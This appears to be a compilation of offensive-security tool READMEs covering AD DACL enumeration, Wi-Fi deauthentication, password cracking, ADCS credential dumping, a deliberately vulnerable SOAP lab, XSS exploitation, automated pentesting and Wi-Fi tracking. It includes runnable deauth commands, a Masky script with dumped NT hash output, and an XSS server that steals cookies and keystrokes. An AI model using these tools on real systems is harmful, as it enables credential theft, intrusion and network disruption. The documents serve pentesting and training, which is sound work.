@coffeegist
@tw1sm

Usage

└─# python3 aced.py -h                             


_____
|A . | _____
| /.\ ||A ^ | _____
|(_._)|| / \ ||A _ | _____
| | || \ / || ( ) ||A_ _ |
|____V|| . ||(_'_)||( v )|
|____V|| | || \ / |
|____V|| . |
|____V|
v1.0

Parse and log a target principal's DACL.
@garrfoster

usage: aced.py [-h] [-ldaps] [-dc-ip DC_IP] [-k] [-no-pass] [-hashes LMHASH:NTHASH] [-aes hex key] [-debug] [-no-smb] target

Tool to enumerate a single target's DACL in Active Directory

optional arguments:
-h, --help show this help message and exit

Authentication:
target [[domain/username[:password]@]<address>
-ldaps Use LDAPS instead of LDAP

Optional Flags:
-dc-ip DC_IP IP address or FQDN of domain controller
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid
credentials cannot be found, it will use the ones specified in the command line
-no-pass don't ask for password (useful for -k)
-hashes LMHASH:NTHASH
LM and NT hashes, format is LMHASH:NTHASH
-aes hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-debug Enable verbose logging.
-no-smb Do not resolve DC hostname through SMB. Requires a FQDN with -dc-ip.

Demo

In the below demo, we have the credentials for the corp.local\lowpriv account. By starting enumeration at Domain Admins, a potential path for privilege escalation is identified by walking backwards from the high value target.
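A run like that could look as follows (the host name and password are illustrative; the target format follows the usage string above):

python3 aced.py -ldaps corp.local/lowpriv:'Password123!'@dc01.corp.local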


And here's how that data looks when transformed by bofhound and ingested into BloodHound.




Autodeauth - A Tool Built To Automatically Deauth Local Networks


A tool built to automatically deauth local networks

Setup

$ chmod +x setup.sh
$ sudo ./setup.sh
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Please enter your WiFi interface name e.g: wlan0 -> wlan1
autodeauth installed

use sudo autodeauth or systemctl start autodeauth

to edit service setting please edit: service file: /etc/systemd/system/autodeauth.service

Options

$ sudo autodeauth -h
_ _ ___ _ _
/_\ _ _| |_ ___| \ ___ __ _ _ _| |_| |_
/ _ \ || | _/ _ \ |) / -_) _` | || | _| ' \
/_/ \_\_,_|\__\___/___/\___\__,_|\_,_|\__|_||_|

usage: autodeauth [-h] --interface INTERFACE [--blacklist BLACKLIST] [--whitelist WHITELIST] [--led LED] [--time TIME] [--random] [--ignore] [--count COUNT] [--verbose VERBOSE]

Auto Deauth Tool

options:
-h, --help show this help message and exit
--interface INTERFACE, -i INTERFACE
Interface to fetch WiFi networks and send deauth packets (must support packet injection)
--blacklist BLACKLIST, -b BLACKLIST
List of network SSIDs/MAC addresses to avoid (comma separated)
--whitelist WHITELIST, -w WHITELIST
List of network SSIDs/MAC addresses to target (comma separated)
--led LED, -l LED Led pin number for led display
--time TIME, -t TIME Time (in s) between two deauth packets (default 0)
--random, -r Randomize your MAC address before deauthing each network
--ignore Ignore errors encountered when randomizing your MAC address
--count COUNT, -c COUNT
Number of packets to send (default 5000)
--verbose VERBOSE, -v VERBOSE
Scapy verbosity setting (default: 0)

Usage

After running the setup, you can run the script by using autodeauth from any directory

Command line

Networks with spaces can be represented using their mac addresses

$ sudo autodeauth -i wlan0 --blacklist FreeWiFi,E1:DB:12:2F:C1:57 -c 10000

Service

$ sudo systemctl start autodeauth

Loot and Log files

Loot

When a network is detected and fits the whitelist/blacklist criteria, its network information is saved as a JSON file in /var/log/autodeauth/

{
"ssid": "MyWiFiNetwork",
"mac_address": "10:0B:21:2E:C1:11",
"channel": 1,
"network.frequency": "2.412 GHz",
"mode": "Master",
"bitrates": [
"6 Mb/s",
"9 Mb/s",
"12 Mb/s",
"18 Mb/s",
"24 Mb/s",
"36 Mb/s",
"48 Mb/s",
"54 Mb/s"
],
"encryption_type": "wpa2",
"encrypted": true,
"quality": "70/70",
"signal": -35
}

Log File

$ cat /var/log/autodeauth/log               
2022-08-20 21:01:31 - Scanning for local networks
2022-08-20 21:20:29 - Sending 5000 deauth frames to network: A0:63:91:D5:B8:76 -- MyWiFiNetwork
2022-08-20 21:21:00 - Exiting/Cleaning up

Edit Service Config

To change the settings of the autodeauth service edit the file /etc/systemd/system/autodeauth.service
Let's say you wanted the following config to be set up as a service

$ sudo autodeauth -i wlan0 --blacklist FreeWiFi,myWifi -c 10000
$ vim /etc/systemd/system/autodeauth.service

Then you would change the ExecStart line to

ExecStart=/usr/bin/python3 /usr/local/bin/autodeauth -i wlan0 --blacklist FreeWiFi,myWifi -c 10000


Awesome-Password-Cracking - A Curated List Of Awesome Tools, Research, Papers And Other Projects Related To Password Cracking And Password Security


A curated list of awesome tools, research, papers and other projects related to password cracking and password security.

Read the guidelines before contributing! In short:


Books

Cloud

  • Cloud_crack - Crack passwords using Terraform and AWS.
  • Cloudcat - A script to automate the creation of cloud infrastructure for hash cracking.
  • Cloudstomp - Automated deployment of instances on EC2 via plugin for high CPU/GPU applications at the lowest price.
  • Cloudtopolis - A tool that facilitates the installation and provisioning of Hashtopolis on the Google Cloud Shell platform, quickly and completely unattended (and also, free!).
  • NPK - NPK is a distributed hash-cracking platform built entirely of serverless components in AWS including Cognito, DynamoDB, and S3.
  • Penglab - Abuse of Google Colab for cracking hashes.
  • Rook - Automates the creation of AWS p3 instances for use in GPU-based password cracking.

Conversion

  • 7z2hashcat - Extract information from password-protected .7z archives (and .sfx files) such that you can crack these "hashes" with hashcat.
  • MacinHash - Convert macOS plist password file to hash file for password crackers.
  • NetNTLM-Hashcat - Converts John The Ripper/Cain format hashes (singular, or in bulk) to HashCat compatible hash format.
  • Rubeus-to-Hashcat - Converts / formats Rubeus kerberoasting output into hashcat readable format.
  • WINHELLO2hashcat - With this tool one can extract the "hash" from a WINDOWS HELLO PIN. This hash can be cracked with Hashcat.
  • bitwarden2hashcat - A tool that converts Bitwarden's data into a hashcat-suitable hash.
  • hc_to_7z - Convert 7-Zip hashcat hashes back to 7z archives.
  • hcxtools - Portable solution for conversion of cap/pcap/pcapng (gz compressed) WiFi dump files to hashcat formats.
  • itunes_backup2hashcat - Extract the information needed from the Manifest.plist files to convert it to hashes compatible with hashcat.
  • mongodb2hashcat - Extract hashes from the MongoDB database server to a hash format that hashcat accepts: -m 24100 (SCRAM-SHA-1) or -m 24200 (SCRAM-SHA-256).

Hashcat

Hashcat is the "World's fastest and most advanced password recovery utility." The following are projects directly related to Hashcat in one way or another.

  • Autocrack - A set of client and server tools for automatically, and lightly automatically cracking hashes.
  • docker-hashcat - Latest hashcat docker for Ubuntu 18.04 CUDA, OpenCL, and POCL.
  • Hashcat-Stuffs - Collection of hashcat lists and things.
  • hashcat-utils - Small utilities that are useful in advanced password cracking.
  • Hashfilter - Read a hashcat potfile and parse different types into a sqlite database.
  • known_hosts-hashcat - A guide and tool for cracking ssh known_hosts files with hashcat.
  • pyhashcat - Python C API binding to libhashcat.

Automation

  • autocrack - Hashcat wrapper to help automate the cracking process.
  • hashcat.launcher - A cross-platform app that run and control hashcat.
  • hat - An Automated Hashcat Tool for common wordlists and rules to speed up the process of cracking hashes during engagements.
  • hate_crack - A tool for automating cracking methodologies through Hashcat from the TrustedSec team.
  • Naive hashcat - Naive hashcat is a plug-and-play script that is pre-configured with naive, empirically-tested, "good enough" parameters/attack types.

Distributed cracking

  • CrackLord - Queue and resource system for cracking passwords.
  • fitcrack - A hashcat-based distributed password cracking system.
  • Hashtopolis - A multi-platform client-server tool for distributing hashcat tasks to multiple computers.
  • Kraken - A multi-platform distributed brute-force password cracking system.

Rules

  • clem9669 rules - Rule for hashcat or john.
  • hashcat rules collection - Probably the largest collection of hashcat rules out there.
  • Hob0Rules - Password cracking rules for Hashcat based on statistics and industry patterns.
  • Kaonashi - Wordlist, rules and masks from Kaonashi project (RootedCON 2019).
  • nsa-rules - Password cracking rules and masks for hashcat generated from cracked passwords.
  • nyxgeek-rules - Custom password cracking rules for Hashcat and John the Ripper.
  • OneRuleToRuleThemAll - "One rule to crack all passwords. or atleast we hope so."
  • pantagrule - Large hashcat rulesets generated from real-world compromised passwords.

Rule tools

  • duprule - Detect & filter duplicate hashcat rules.

Web interfaces

  • crackerjack - CrackerJack is a Web GUI for Hashcat developed in Python.
  • CrackQ - A Python Hashcat cracking queue system.
  • hashpass - Hash cracking WebApp & Server for hashcat.
  • Hashview - A web front-end for password cracking and analytics.
  • Wavecrack - Wavestone's web interface for password cracking with hashcat.
  • WebHashCat - WebHashcat is a very simple but efficient web interface for hashcat password cracking tool.

John the Ripper

John the Ripper is "an Open Source password security auditing and password recovery tool available for many operating systems." The following are projects directly related to John the Ripper in one way or another.

  • BitCracker - BitCracker is the first open source password cracking tool for memory units encrypted with BitLocker.
  • johnny - GUI frontend to John the Ripper.

Misc

  • hashID - Software to identify the different types of hashes.
  • Name That Hash - Don't know what type of hash it is? Name That Hash will name that hash type! Identify MD5, SHA256 and 300+ other hashes. Comes with a neat web app.

Websites

Communities

  • hashcat Forum - Forum by the developers of hashcat.
  • Hashmob - A growing password recovery community aimed towards being a center point of collaboration for cryptography enthusiasts.
  • Hashkiller Forum - A password cracking forum with over 20,000 registered users.

Lookup services

  • CMD5 - Provides online MD5 / sha1/ mysql / sha256 encryption and decryption services.
  • CrackStation - Free hash lookup service supplying wordlists as well.
  • Hashes.com - A hash lookup service with paid features.
  • Hashkiller - A hash lookup service with a forum.
  • Online Hash Crack - Cloud password recovery service.

Wordlist tools

Tools for analyzing, generating and manipulating wordlists.

Analysis

  • PACK - A collection of utilities developed to aid in analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character-sets and other password characteristics.
  • pcfg_cracker - This project uses machine learning to identify password creation habits of users.
  • Pipal - THE password analyser.

Generation/Manipulation

  • common-substr - Simple tool to extract the most common substrings from an input text. Built for password cracking.
  • Crunch - Crunch is a wordlist generator where you can specify a standard character set or a character set you specify. Crunch can generate all possible combinations and permutations.
  • CUPP - A tool that lets you generate wordlists by user profiling data such as birthday, nickname, address, name of a pet or relative etc.
  • duplicut - Remove duplicates from MASSIVE wordlist, without sorting it (for dictionary-based password cracking).
  • Gorilla - Tool for generating wordlists or extending an existing one using mutations.
  • Keyboard-Walk-Generators - Generate Keyboard Walk Dictionaries for cracking.
  • kwprocessor - Advanced keyboard-walk generator with configurable basechars, keymap and routes.
  • maskprocessor - High-performance word generator with a per-position configurable charset.
  • maskuni - A standalone fast word generator in the spirit of hashcat's mask generator with unicode support.
  • Mentalist - Mentalist is a graphical tool for custom wordlist generation. It utilizes common human paradigms for constructing passwords and can output the full wordlist as well as rules compatible with Hashcat and John the Ripper.
  • Phraser - Phraser is a phrase generator using n-grams and Markov chains to generate phrases for passphrase cracking.
  • princeprocessor - Standalone password candidate generator using the PRINCE algorithm.
  • Rephraser - A Python-based reimagining of Phraser using Markov-chains for linguistically-correct password cracking.
  • Rling - RLI Next Gen (Rling), a faster multi-threaded, feature rich alternative to rli found in hashcat utilities.
  • statsprocessor - Word generator based on per-position markov-chains.
  • TTPassGen - Flexible and scriptable password dictionary generator which supports brute-force, combination, complex rule modes etc.
  • token-reverser - Words list generator to crack security tokens.
  • WikiRaider - WikiRaider enables you to generate wordlists based on country specific databases of Wikipedia.

Wordlists

Language specific

  • Albanian wordlist - A mix of names, last names and some albanian literature.
  • Danish Phone Wordlist Generator - This tool can generate wordlists of Danish phone numbers by area and/or usage (Mobile, landline etc.) Useful for password cracking or fuzzing Danish targets.
  • Danish Wordlists - Collection of danish wordlists for cracking danish passwords.
  • French Wordlists - This project aim to provide french word list about everything a person could use as a base password.

Other

  • Packet Storm Wordlists - A substantial collection of different wordlists in multiple languages.
  • Rocktastic - Includes many permutations of passwords and patterns that have been observed in the wild.
  • RockYou2021 - RockYou2021.txt is a MASSIVE WORDLIST compiled of various other wordlists.
  • WeakPass - Collection of large wordlists.

Specific file formats

PDF

  • pdfrip - A multi-threaded PDF password cracking utility equipped with commonly encountered password format builders and dictionary attacks.

PEM

JKS

  • JKS private key cracker - Cracking passwords of private key entries in a JKS file.

ZIP

  • bkcrack - Crack legacy zip encryption with Biham and Kocher's known plaintext attack.
  • frackzip - Small tool for cracking encrypted ZIP archives.

Artificial Intelligence

  • adams - Reducing Bias in Modeling Real-world Password Strength via Deep Learning and Dynamic Dictionaries. - Code for cracking passwords with neural networks.
  • RNN-Passwords - Using the char-rnn to learn and guess passwords.
  • rulesfinder - This tool finds efficient password mangling rules (for John the Ripper or Hashcat) for a given dictionary and a list of passwords.

Research

Papers

Talks



Masky - Python Library With CLI Allowing To Remotely Dump Domain User Credentials Via An ADCS Without Dumping The LSASS Process Memory


Masky is a python library providing an alternative way to remotely dump domain users' credentials thanks to an ADCS. A command line tool has been built on top of this library in order to easily gather PFX files, NT hashes and TGTs across a larger scope.

This tool does not exploit any new vulnerability and does not work by dumping the LSASS process memory. Instead, it only takes advantage of legitimate Windows and Active Directory features (token impersonation, certificate authentication via Kerberos, and NT hash retrieval via PKINIT). A blog post was published detailing the implemented techniques and how Masky works.

Masky's source code is largely based on the amazing Certify and Certipy tools. I really thank their authors for their research regarding offensive exploitation techniques against ADCS (see the Acknowledgments section).


Installation

The Masky python3 library and its associated CLI can be simply installed via the public PyPI repository as follows:

pip install masky

The Masky agent executable is already included within the PyPi package.

Moreover, if you need to modify the agent, the C# code can be recompiled via the Visual Studio project located in agent/Masky.sln. It requires .NET Framework 4 to be built.

Usage

Masky has been designed as a Python library. Moreover, a command line interface was created on top of it to ease its usage during pentest or RedTeam activities.

For both usages, you first need to retrieve the FQDN of a CA server and its CA name deployed via ADCS. This information can easily be retrieved via the certipy find option or via the Microsoft built-in certutil.exe tool. Make sure that the default User template is enabled on the targeted CA.

Warning: Masky deploys an executable on each target via a modification of the existing RasAuto service. Despite the automated roll-back of its initial ImagePath value, an unexpected error during Masky's runtime could skip the cleanup phase. Therefore, do not forget to manually reset the original value in case of such an unwanted stop.

Command line

The following demo shows basic usage of Masky by targeting 4 remote systems. Its execution allows collecting NT hashes, CCACHE and PFX files of 3 distinct domain users from the sec.lab testing domain.

Masky also provides options that are commonly offered by such tools (thread count, authentication mode, targets loaded from files, etc.); an example invocation is shown after the help output below.

  __  __           _
| \/ | __ _ ___| | ___ _
| |\/| |/ _` / __| |/ / | | |
| | | | (_| \__ \ <| |_| |
|_| |_|\__,_|___/_|\_\__, |
v0.0.3 |___/

usage: Masky [-h] [-v] [-ts] [-t THREADS] [-d DOMAIN] [-u USER] [-p PASSWORD] [-k] [-H HASHES] [-dc-ip ip address] -ca CERTIFICATE_AUTHORITY [-nh] [-nt] [-np] [-o OUTPUT]
[targets ...]

positional arguments:
targets Targets in CIDR, hostname and IP formats are accepted, from a file or not

options:
-h, --help show this help message and exit
-v, --verbose Enable debugging messages
-ts, --timestamps Display timestamps for each log
-t THREADS, --threads THREADS
Threadpool size (max 15)

Authentication:
-d DOMAIN, --domain DOMAIN
Domain name to authenticate to
-u USER, --user USER Username to authenticate with
-p PASSWORD, --password PASSWORD
Password to authenticate with
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters.
-H HASHES, --hashes HASHES
Hashes to authenticate with (LM:NT, :NT or :LM)

Connection:
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-ca CERTIFICATE_AUTHORITY, --certificate-authority CERTIFICATE_AUTHORITY
Certificate Authority Name (SERVER\CA_NAME)

Results:
-nh, --no-hash Do not request NT hashes
-nt, --no-ccache Do not save ccache files
-np, --no-pfx Do not save pfx files
-o OUTPUT, --output OUTPUT
Local path to a folder where Masky results will be stored (automatically creates the folder if it does not exist)
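Putting those options together, a plausible invocation mirroring the library demo below (the password is illustrative) would be:

Masky -d sec.lab -u askywalker -p 'P@ssw0rd!' -dc-ip 192.168.23.148 -ca 'srv-01.sec.lab\sec-SRV-01-CA' 192.168.23.130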

Python library

Below is a simple script using the Masky library to collect secrets of running domain user sessions from a remote target.

from masky import Masky
from getpass import getpass


def dump_nt_hashes():
    # Define the authentication parameters
    ca = "srv-01.sec.lab\\sec-SRV-01-CA"
    dc_ip = "192.168.23.148"
    domain = "sec.lab"
    user = "askywalker"
    password = getpass()

    # Create a Masky instance with these credentials
    m = Masky(ca=ca, user=user, dc_ip=dc_ip, domain=domain, password=password)

    # Set a target and run Masky against it
    target = "192.168.23.130"
    rslts = m.run(target)

    # Check if Masky successfully hijacked at least one user session
    # or if an unexpected error occurred
    if not rslts:
        return False

    # Loop on the MaskyResult object to display hijacked users and retrieve their NT hashes
    print(f"Results from hostname: {rslts.hostname}")
    for user in rslts.users:
        print(f"\t - {user.domain}\\{user.name} - {user.nt_hash}")

    return True


if __name__ == "__main__":
    dump_nt_hashes()

Its execution generates the following output.

$> python3 .\masky_demo.py
Password:
Results from hostname: SRV-01
- sec\hsolo - 05ff4b2d523bc5c21e195e9851e2b157
- sec\askywalker - 8928e0723012a8471c0084149c4e23b1
- sec\administrator - 4f1c6b554bb79e2ce91e012ffbe6988a

A MaskyResults object containing a list of User objects is returned after a successful execution of Masky.

Please look at the masky\lib\results.py module to check the methods and attributes provided by these two classes.

Acknowledgments



Erlik - Vulnerable Soap Service


Erlik - Vulnerable Soap Service

Tested - Kali 2022.1

Description

It is a vulnerable SOAP web service: a lab environment created for people who want to improve themselves in the field of web penetration testing.


Features

It contains the following vulnerabilities.

  • LFI
  • SQL Injection
  • Information Disclosure
  • Command Injection
  • Brute Force
  • Deserialization

Installation

git clone https://github.com/anil-yelken/Vulnerable-Soap-Service

cd Vulnerable-Soap-Service

sudo pip3 install -r requirements.txt

Usage

sudo python3 vulnerable_soap.py

Exploiting Vulnerabilities

LFI

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/lfi.py

SQL Injection

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/sqli.py

Information Disclosure

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/get_logs_information_disclosure.py

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/get_data_information_disclosure.py

Command Injection

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/commandi.py

Brute Force

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/brute.py

Deserialization

Code:

https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/deserialization_socket.py

https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/deserialization_requests.py



Toxssin - An XSS Exploitation Command-Line Interface And Payload Generator


toxssin is an open-source penetration testing tool that automates the process of exploiting Cross-Site Scripting (XSS) vulnerabilities. It consists of an https server that works as an interpreter for the traffic generated by the malicious JavaScript payload that powers this tool (toxin.js).

This project started as (and still is) a research-based creative endeavor to explore the exploitability depth that an XSS vulnerability may introduce by using vanilla JavaScript, trusted certificates and cheap tricks.

Disclaimer: The project is quite fresh and has not been widely tested.

Video Presentation


Find screenshots here.

Capabilities

By default, toxssin intercepts:

  • cookies (if HttpOnly not present),
  • keystrokes,
  • paste events,
  • input change events,
  • file selections,
  • form submissions,
  • server responses,
  • table data (static as well as updates),

Most importantly, toxssin:

  • attempts to maintain XSS persistence while the user browses the website by intercepting http requests & responses and re-writing the document,
  • supports session management, meaning that you can use it to exploit reflected as well as stored XSS,
  • supports custom JS script execution against sessions,
  • automatically logs every session.

Installation & Usage

git clone https://github.com/t3l3machus/toxssin
cd ./toxssin
pip3 install -r requirements.txt

To start toxssin.py, you will need to supply ssl certificate and private key files.

If you don't own a domain with a trusted certificate, you can issue and use self-signed certificates with the following command (although this won't take you far):

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365

It is strongly recommended to run toxssin with a trusted certificate (see How to get a Valid Certificate in this document). That said, you can start the toxssin server like this:

# python3 toxssin.py -u https://your.domain.com -c /your/certificate.pem -k /your/privkey.pem

Visit the project's wiki for additional information.

XSS Exploitation Obstacles

In my experience, there are 4 major obstacles when it comes to Cross-Site Scripting attacks attempting to include external JS scripts:

  1. the "Mixed Content" error, which can be resolved by serving the JavaScript payload via https (even with a self-signed certificate).
  2. the "NET::ERR_CERT_AUTHORITY_INVALID" error, which indicates that the server's certificate is untrusted / expired and can be bypassed by using a certificate issued by a trusted Authority.
  3. Cross-origin resource sharing (CORS), which is handled appropriately by the toxssin server.
  4. A Content-Security-Policy header with the script-src set to specific domain(s) only will block scripts with a cross-domain src from loading. Toxssin relies on the eval() function to deliver its poison, so, if the website has a CSP and the unsafe-eval source expression is not specified in the script-src directive, the attack will most likely fail (I'm working on a second poison delivery method to work around this).

Note: The "Mixed Content" error can of course occur when the target website is hosted via http and the JavaScript payload via https. This limits the scope of toxssin to https only webistes, as (by default) toxssin is started with ssl only.

How to get a Valid Certificate

First, you need to own a domain name. The fastest and most economical way to get one (to my knowledge) is via a cheap domain registrar service (e.g. https://www.namecheap.com/). Search for a random-string domain name (e.g. "fvcm98duf") and check the less popular TLDs, like .xyz, as they will probably cost around $3 per year.

After you purchase a domain name, you can use certbot (Let's Encrypt) to get a trusted certificate in 5 minutes or less:

  1. Append an A record to your Domain's DNS settings so that it points to your server ip,
  2. Follow certbots official instructions.

Tip: Don't install and run certbot on your own; you might get unexpected errors. Stick with the instructions.

Changelog

2022-06-19 - Added the exec prompt command (you can now execute custom JS scripts against a session).
2022-06-23 - I added two simple, dirty scripts as templates for testing the exec prompt command. I also fixed the cmd prompt's backward history access and made some improvements.

Future

The idea is to make it sharper, more reliable, and to expand its capabilities. Currently, I'm working on improving file captures.



Rekono - Execute Full Pentesting Processes Combining Multiple Hacking Tools Automatically


Rekono combines other hacking tools and their results to execute complete pentesting processes against a target in an automated way. The findings obtained during the executions will be sent to the user via email or Telegram notifications, and can also be imported into Defect-Dojo if advanced vulnerability management is needed. Moreover, Rekono includes a Telegram bot that can be used to perform executions easily from anywhere and from any device.


Features

  • Combine hacking tools to create pentesting processes
  • Execute pentesting processes
  • Execute pentesting tools
  • Review findings and receive them via email or Telegram notifications
  • Use Defect-Dojo integration to import the findings detected by Rekono
  • Execute tools and processes from Telegram Bot
  • Wordlists management

Why Rekono?

Do you ever think about the steps that you follow when starting a pentest? Probably you start performing some OSINT tasks to gather public information about the target. Then, maybe you run host discovery and port enumeration tools. When you know what the target exposes, you can execute more specific tools for each service to get more information and, maybe, some vulnerabilities. And finally, if you find the needed information, you will look for a public exploit to get into the target machine. I know, I know, this is a utopian scenario, and in most cases vulnerabilities are found thanks to the pentester's skills rather than scanning tools. But before using your skills, how much time do you spend trying to get as much information as possible with hacking tools? Probably too much.

Why not automate this process and focus on finding vulnerabilities using your skills and the information that Rekono sends you?

The Rekono name comes from the Esperanto language where it means recon.

Supported tools

Thanks to all the contributors of these amazing tools!

Installation

Docker

Execute the following commands in the root directory of the project:

docker-compose build
docker-compose up -d

If you need more than one tool running at the same time, you can set the number of executions-worker instances:

docker-compose up -d --scale executions-worker=5

Go to https://127.0.0.1/

You can check the details in the Docker documentation, especially the initial user documentation.

Using Rekono CLI

If your system is Linux, you can use rekono-cli to install Rekono in your system:

pip3 install rekono-cli
rekono install

After that, you can manage the Rekono services using the following commands:

rekono services start
rekono services stop
rekono services restart

Go to http://127.0.0.1:3000/

⚠️ Only for Linux environments.

⚠️ Docker is advised. Only use that for local and personal usage.

From Source

Check the installation from source in Rekono Wiki

Configuration

Check the configuration options in Rekono Wiki

License

Rekono is licensed under the GNU GENERAL PUBLIC LICENSE Version 3

Support

If you need help you can create a new support Issue or mail rekono.project@gmail.com



ReconPal - Leveraging NLP For Infosec


Recon is one of the most important phases; it seems easy but takes a lot of effort and skill to do right. One needs to know about the right tools, correct queries/syntax, run those queries, correlate the information, and sanitize the output. All of this might be easy for a seasoned infosec/recon professional, but for the rest, it is still close to magic. How cool would it be to ask a simple question like "Find me an open Memcached server in Singapore with UDP support?" or "How many IP cameras in Singapore are using default credentials?" in a chat and get the answer?

The integration of GPT-3, a deep-learning-based language model that produces human-like text, with well-known recon tools like Shodan is the foundation of ReconPal. ReconPal also supports using voice commands to execute popular exploits and perform reconnaissance.
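Conceptually, the glue between the two looks something like this toy sketch, using the legacy OpenAI completion API and the official Shodan client (the prompt, model and key placeholders are illustrative, not ReconPal's actual code):

import openai
import shodan

openai.api_key = "<OPENAI_API_KEY>"
api = shodan.Shodan("<SHODAN_API_KEY>")

question = "Find me an open Memcached server in Singapore with UDP support"
resp = openai.Completion.create(
    model="text-davinci-002",
    prompt=f"Translate the question into a Shodan search query.\n"
           f"Question: {question}\nQuery:",
    max_tokens=32,
)
query = resp.choices[0].text.strip()  # e.g. "product:memcached country:SG"
for match in api.search(query)["matches"][:5]:
    print(match["ip_str"], match["port"])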


Built With

  • OpenAI GPT-3
  • Shodan API
  • Speech-to-Text
  • Telegram Bot
  • Docker Containers
  • Python 3

Getting Started

To get ReconPal up and running, follow these simple steps.

Prerequisites

Installation

  1. Clone the repo

    git clone https://github.com/pentesteracademy/reconpal.git
  2. Enter your OPENAI, SHODAN API keys, and TELEGRAM bot token in docker-compose.yml

    OPENAI_API_KEY=<Your key>
    SHODAN_API_KEY=<Your key>
    TELEGRAM_BOT_TOKEN=<Your token>
  3. Start reconpal

    docker-compose up

Usage

Open the telegram app and select the created bot to use ReconPal.

  1. Click on start or just type in the input box.
     /start
  2. Register the model.
     /register
  3. Test the tool with some commands.
     scan 10.0.0.8

Tool featured at

Contributors

Jeswin Mathai, Senior Security Researcher, INE jmathai@ine.com

Nishant Sharma, Security Research Manager, INE nsharma@ine.com

Shantanu Kale, Cloud Developer, INE skale@ine.com

Sherin Stephen, Cloud Developer, INE sstephen@ine.com

Sarthak Saini (Ex-Pentester Academy)

Documentation

For more details, refer to the "ReconPal.pdf" PDF file. This file contains the slide deck used for presentations.

Screenshots

Starting reconpal and registering model

Finder module in action

Scanner module in action

Attacker module in action

Voice Support

License

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License v2 as published by the Free Software Foundation.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see http://www.gnu.org/licenses/.



dBmonster - Track WiFi Devices With Their Received Signal Strength


With dBmonster you are able to scan for nearby WiFi devices and track them through the signal strength (dBm) of the packets they send (sniffed with TShark). These dBm values are plotted on a graph with matplotlib. It can help you identify the exact location of nearby WiFi devices (use a directional WiFi antenna for the best results) or find out how your self-made antenna performs best (antenna radiation patterns).
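The core loop can be pictured like this, as a simplified Python sketch (not dBmonster's actual code; the interface name and MAC address are illustrative):

import subprocess
import matplotlib.pyplot as plt

target = "10:0b:21:2e:c1:11"  # MAC of the device to track
cmd = [
    "tshark", "-i", "wlan0mon", "-l",           # monitor-mode interface
    "-Y", f"wlan.sa == {target}",               # frames sent by the target
    "-T", "fields", "-e", "wlan_radio.signal_dbm",
]
values = []
with subprocess.Popen(cmd, stdout=subprocess.PIPE, text=True) as proc:
    for line in proc.stdout:
        if line.strip():
            values.append(int(line))
            plt.clf()
            plt.plot(values)
            plt.ylabel("signal strength (dBm)")
            plt.pause(0.01)  # redraw without blocking the capture loop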


Features on Linux and MacOS

Feature Linux MacOS
Listing WiFi interfaces
Track & scan on 2.4GHz
Track & scan on 5GHz
Scanning for AP
Scanning for STA
Beep when device found

Installation

git clone https://github.com/90N45-d3v/dBmonster
cd dBmonster

# Install required tools (On MacOS without sudo)
sudo python requirements.py

# Start dBmonster
sudo python dBmonster.py

Has been successfully tested on...

  • Kali Linux: ALFA AWUS036NHA, DIY Bi-Quad WiFi Antenna
  • MacOS Monterey: Internal card 802.11 a/b/g/n/ac (MBP 2019)
* should work on any MacOS or Debian based system and with every WiFi card that supports monitor-mode

Troubleshooting for MacOS

Normally, you can only enable monitor mode on the internal WiFi card of a Mac with Apple's airport utility. Somehow, Wireshark (or here, TShark) can enable it too on MacOS. Cool, but because of the MacOS system and Wireshark's workaround, there are many issues running dBmonster on MacOS. After some time it could freeze, and/or you may have to stop dBmonster/TShark manually from the CLI using the ps command. If you want to run it anyway, here are some helpful tips:

Kill dBmonster, if you can't stop it over the GUI

Look if there are any processes, named dBmonster, tshark or python:

sudo ps -U root

Now kill them with the following command:

sudo kill <PID OF PROCESS>

Stop monitor-mode, if it's enabled after running dBmonster

sudo airport <WiFi INTERFACE NAME> sniff

Press control + c after a few seconds

* Please contact me on Twitter if you have any more problems

Working on...

  • Capture signal strength data for offline graphs
  • Generate graphs from normal wireshark.pcapng file
  • Generate multiple graphs in one coordinate system

Additional information

  • If the tracked WiFi device is out of range or doesn't send any packets, the graph stops plotting till there is new data. So don't panic ;)
  • dBmonster wasn't tested on all systems... If there are any errors or something is going wrong, contact me.
  • If you used dBmonster on a non-listed Platform or WiFi Adapter, please open an issue (with Platform and WiFi Adapter information) and I will add your specification to the README.md


Ox4Shell - Deobfuscate Log4Shell Payloads With Ease


Deobfuscate Log4Shell payloads with ease.

Description

Since the release of the Log4Shell vulnerability (CVE-2021-44228), many tools were created to obfuscate Log4Shell payloads, making the lives of security engineers a nightmare.

This tool intends to unravel the true contents of obfuscated Log4Shell payloads.

For example, consider the following obfuscated payload:

